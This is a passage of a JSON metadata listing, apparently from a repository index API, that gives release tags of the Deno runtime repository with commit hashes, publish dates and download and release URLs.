/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v